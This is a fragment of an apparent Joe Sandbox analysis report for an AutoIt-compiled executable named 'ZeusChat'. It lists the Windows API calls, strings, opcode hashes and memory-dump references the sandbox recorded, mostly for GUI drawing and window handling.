  • Part of subcall function 00007FF7520AF418: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4EB
  • Part of subcall function 00007FF7520AF418: SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4FB
  • Part of subcall function 00007FF7520AF418: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF50E
  • Part of subcall function 00007FF7520AF418: InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF535
  • Part of subcall function 00007FF7520AF418: RoundRect.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF561
  • Part of subcall function 00007FF7520AF418: GetWindowLongW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF56F
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
• String ID:
• API String ID: 3521893082-0
• Opcode ID: f6b3e33df0b6fd49e851f84cb0d7e1a0081305ee093791da2a064367007aa246
• Instruction ID: b2c453aa662f745f06945bc56a4f4d4a49cd87890876fbcfd8adbc9731f9eed7
• Opcode Fuzzy Hash: f6b3e33df0b6fd49e851f84cb0d7e1a0081305ee093791da2a064367007aa246
• Instruction Fuzzy Hash: 92A1E536F06A0286EB64AB61DC4467DA761BB49B64F884330CE2E13BD4DF7D984CC360
APIs
• GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF45F
• SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF46A
• GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF485
• GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF498
• CreateSolidBrush.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4A2
• GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4C3
• CreatePen.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4DA
• SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4EB
• SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4FB
• SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF50E
• InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF535
• RoundRect.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF561
• GetWindowLongW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF56F
• SendMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF5BC
• GetWindowTextW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF5F4
• InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF617
• DrawFocusRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF625
• GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF634
• SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF63F
• DrawTextW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF65D
• SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF67B
• DeleteObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF689
• SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF697
• DeleteObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF6A2
• SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF6AE
• SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF6BE
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
• Instruction ID: 186e0602eacdc0904897579a8a5138dbf5a98a2b5992f8f680647464f0d57c08
• Opcode Fuzzy Hash: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
• Instruction Fuzzy Hash: 5471A336A0AA4186E764AB21EC4473EB761FB89BA0F844334DE5E43794DFBCD848C710
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Color$LongWindow$ModeObjectStockText
• String ID:
• API String ID: 554392163-0
• Opcode ID: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
• Instruction ID: 2729d0981b1df4f1ca23f0a240b3fa1deae4872d1c4e88c6c8285cf68eabe939
• Opcode Fuzzy Hash: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
• Instruction Fuzzy Hash: 1D81D631D0E65286FA70AB299C5827DA392EF49B54FDD4231C95D032E4DE7CB84AC360
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 2091158083-3440237614
• Opcode ID: a6383f7ad2c15784484526503c134a2164f43bfe7e3a3a9e6e3dd31a7eae073a
• Instruction ID: 2fe4ed7a0bbc0e1065a0eb0eec2355033c7c78574fe8fd04b0231600c32a1036
• Opcode Fuzzy Hash: a6383f7ad2c15784484526503c134a2164f43bfe7e3a3a9e6e3dd31a7eae073a
• Instruction Fuzzy Hash: 4B714D32619A8296E720EB25EC547EDE721FB84794FC80032DA4D07A99DFBCD54EC710
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
• String ID: .dll$.exe$.icl
• API String ID: 258715311-1154884017
• Opcode ID: 6a1298940e1642c5f8eac90391968d97117fa4591b4f58ce6483caa2bbefa5f3
• Instruction ID: 1b4dfd9c7540f434bca6ca1bb542ea9a6bb56755edc5f42b3a247795ca11bc90
• Opcode Fuzzy Hash: 6a1298940e1642c5f8eac90391968d97117fa4591b4f58ce6483caa2bbefa5f3
• Instruction Fuzzy Hash: 4E71B732A0AB1282EB70AF21DC4477EA6A5FB45B94F884635DD1D47794DFBDD848C320
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
• String ID:
• API String ID: 2779716855-0
• Opcode ID: 5ce09494ab24ac1ed07fa16ca7819eb05e9d682ed7dc52cd5bd0682f6ced3240
• Instruction ID: 9d80d41e4f30f37d7644cd909dfdc3b84bb9ab7e5b2853f382796cdeac184698
• Instruction Fuzzy Hash: FC518A36B06B0186EB64EF62E854A6D77A1FB48B99F984131DE1E03B04DF7DD809C710
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID:
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 0-3931177956
• Opcode ID: 38560f2f3fa774d15aa6a8c65f2969727263349bd26c7da2756ce7c29d18a3b4
• Instruction ID: 79b7a43629565cc9742dca41f6d754c3895df3e7428876dec6a0fe47e4a4fe88
• Instruction Fuzzy Hash: CF027436A0A64285FA58BB29D95417EF3B0FF44B80F8D4135CA0E07A95DFBDE959C320
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID:
• String ID: NULL Pointer assignment
• API String ID: 0-2785691316
• Opcode ID: 3cbbc719979583f5783d410f4d2771c0b32c38c29e3e03eccb0298c3601c94f3
• Instruction ID: 9ea9abf1ef4ac34be2c93435ca3180c00865565267f57a05fe5bf028e3f21fb4
• Instruction Fuzzy Hash: CF518372B16A5289EB50EF21DC807BCB770FB84B88F884031DA0E57A55DF78E449C350
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep
• String ID: P
• API String ID: 1460738036-3110715001
• Opcode ID: bc901e50a334b4a7c78d094858a5c527965ee132f71a92aa0f5dc32a9aa332c1
• Instruction ID: 4d4848138e933bb88868e26b2f54bae3cb3cf14198bf36d5a4b01a9dd8b432a7
• Instruction Fuzzy Hash: 6071C626A0E59256F760FB659C507BEA762FB84748FDC4031DA4E07685DEBCE84EC320
APIs
• GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003BA6
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003BBB
• GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003C35
  • Part of subcall function 00007FF752002BEC: GetFullPathNameW.KERNEL32(?,00007FF752003C67,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752002C4D
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003CCC
• MessageBoxA.USER32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF75204AA96
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF75204AAE3
• GetForegroundWindow.USER32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF75204AB6A
• ShellExecuteW.SHELL32(?,?,?,?,?,00007FF752002BC1), ref: 00007FF75204AB91
  • Part of subcall function 00007FF752003CEC: GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D06
  • Part of subcall function 00007FF752003CEC: LoadCursorW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D16
  • Part of subcall function 00007FF752003CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D2B
  • Part of subcall function 00007FF752003CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D44
  • Part of subcall function 00007FF752003CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D5D
  • Part of subcall function 00007FF752003CEC: LoadImageW.USER32 ref: 00007FF752003D89
  • Part of subcall function 00007FF752003CEC: RegisterClassExW.USER32 ref: 00007FF752003DED
  • Part of subcall function 00007FF752003E24: CreateWindowExW.USER32 ref: 00007FF752003E74
  • Part of subcall function 00007FF752003E24: CreateWindowExW.USER32 ref: 00007FF752003EC7
  • Part of subcall function 00007FF752003E24: ShowWindow.USER32 ref: 00007FF752003EDD
  • Part of subcall function 00007FF75200477C: Shell_NotifyIconW.SHELL32 ref: 00007FF752004874
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
• String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
• API String ID: 1593035822-2030392706
• Opcode ID: 1b2e34a7381e4e35feefe2342ee61d9da47ff135a521147e2ec28fd6c13dfd44
• Instruction ID: a02c0ad9443ce292b20a08c78249b3ffba5246b369950845777f370edf83e367
• Instruction Fuzzy Hash: 19614961A5F6839AFA60FB20EC805F9E761BF41354FC84032D58D065AADFACE54EC720
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: LoadStringwprintf
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 3297454147-3080491070
• Opcode ID: b1c87d20e2fab5ea52848e67197744439dd02fd7dad917650ee75d30fdaea2ed
• Instruction ID: 5572c3787ff294ab37ce769bc9ce3210dee71b9a63d517a0a58ce390797ded44
• Instruction Fuzzy Hash: 56615F22A1AA5295FB14FB24EC405FDA721FB84744FC80032EA4D5769ADFBDE50EC720
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: HandleLoadModuleString$Messagewprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 4051287042-2268648507
• Opcode ID: 62d3efdd22561061cae8cb835c91bde9e20e159738d326f93298747da2c55c00
• Instruction ID: 5501d8c32d91bb808a4a224354131f03e1087897b6aaf67dcdbc208531c23995
• Instruction Fuzzy Hash: F5516221B1AA5691EA10FB60EC415BDA321FF84754FC84032EA4D5769ADFBCD50EC750
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Destroy$AcceleratorKillTableTimerWindow
• String ID:
• API String ID: 1974058525-0
• Opcode ID: c5a335280972faf6a49444eab98031eca0eed2acb66a1a220016335a9642b9bc
• Instruction ID: c26bd59ca8f1797a3e54361242edd81cb2498f7ed9ead1ea60f5ac973668a2c3
• Instruction Fuzzy Hash: 10913836A0BA0681FA64AF55DC90679A361BF84B84FDC4131D94E47759CFBCE849C360
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID: P
• API String ID: 1268354404-3110715001
• Opcode ID: 65985f514fe282cf7fc84508a366ad01552345b2107e3be222cdfd0a1f15b60d
                                                                                                      • Instruction ID: d4a01184097162010dfb6619c2834d6c703dc5c35db1d4c44c9d3f5e07f14c6f
                                                                                                      • Opcode Fuzzy Hash: 65985f514fe282cf7fc84508a366ad01552345b2107e3be222cdfd0a1f15b60d
                                                                                                      • Instruction Fuzzy Hash: A361A336E0A6018AFB64AF25DC8067DA7A1FB48B98F984135DD0E47794DFBCE448C750
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                                                      • String ID: static
                                                                                                      • API String ID: 3821898125-2160076837
                                                                                                      • Opcode ID: c03bc4cbd0e80d437ddc16db197f3997b0fadd0aa29a366dc6835b7237bf8b41
                                                                                                      • Instruction ID: 4286d5af032e9c1ffe868027379b4b1c4819bcd8224090f76900cf74becc178f
                                                                                                      • Opcode Fuzzy Hash: c03bc4cbd0e80d437ddc16db197f3997b0fadd0aa29a366dc6835b7237bf8b41
                                                                                                      • Instruction Fuzzy Hash: F341DD32A0978187E770AF25E844B5EB3A1FB88790F944235DA9D43B98CF7CD849CB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                                      • API String ID: 2667193904-1575078665
                                                                                                      • Opcode ID: 62e5a476b600ec05f0d2790c9d0efbf7d7efba7b32e8e3b7640c97021270d09d
                                                                                                      • Instruction ID: 21bc218c98a82cb8920f61728be96a6dcae5960779f7144491ab735e12704aea
                                                                                                      • Opcode Fuzzy Hash: 62e5a476b600ec05f0d2790c9d0efbf7d7efba7b32e8e3b7640c97021270d09d
                                                                                                      • Instruction Fuzzy Hash: C1913022A1AA4395EA60FB24EC801BDB364FF84744FC84236E54D43AA5DFBCD54AC760
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                      • String ID: TaskbarCreated
                                                                                                      • API String ID: 129472671-2362178303
                                                                                                      • Opcode ID: c8a61ef6ba8fcfb5c434e9d74e70d64f9c97e8120f793cf46b099463dba2e8ac
                                                                                                      • Instruction ID: 722145bc61b33808391c8dad30ccffd3cd7d2565d55ab346378c40522fc5e5e2
                                                                                                      • Opcode Fuzzy Hash: c8a61ef6ba8fcfb5c434e9d74e70d64f9c97e8120f793cf46b099463dba2e8ac
                                                                                                      • Instruction Fuzzy Hash: 0F518C31E5E64386FAA4BB24EC94279E6A6AF45740FCC0131C48D426A6DFEDF50EC364
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                      • API String ID: 3215553584-2617248754
                                                                                                      • Opcode ID: ded73e00c8e6cc6561cc55327789767f53a96699fca3135d68715b719835a39c
                                                                                                      • Instruction ID: 61984ff10ded4a305241283531339a50ab975adb397e02e97997b0285dff9825
                                                                                                      • Opcode Fuzzy Hash: ded73e00c8e6cc6561cc55327789767f53a96699fca3135d68715b719835a39c
                                                                                                      • Instruction Fuzzy Hash: 29419C72A0AB4589FB54DF25EC417AD73A4EB28398F884136EE5C07B94DE7CD42AC350
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000001,00007FF75204BC28,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF75200475D), ref: 00007FF752077CE6
                                                                                                      • LoadStringW.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF75200475D,?,00007FF752003C00), ref: 00007FF752077D00
                                                                                                      • wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF752077D43
                                                                                                      • MessageBoxW.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF75200475D,?,00007FF752003C00), ref: 00007FF752077DD7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
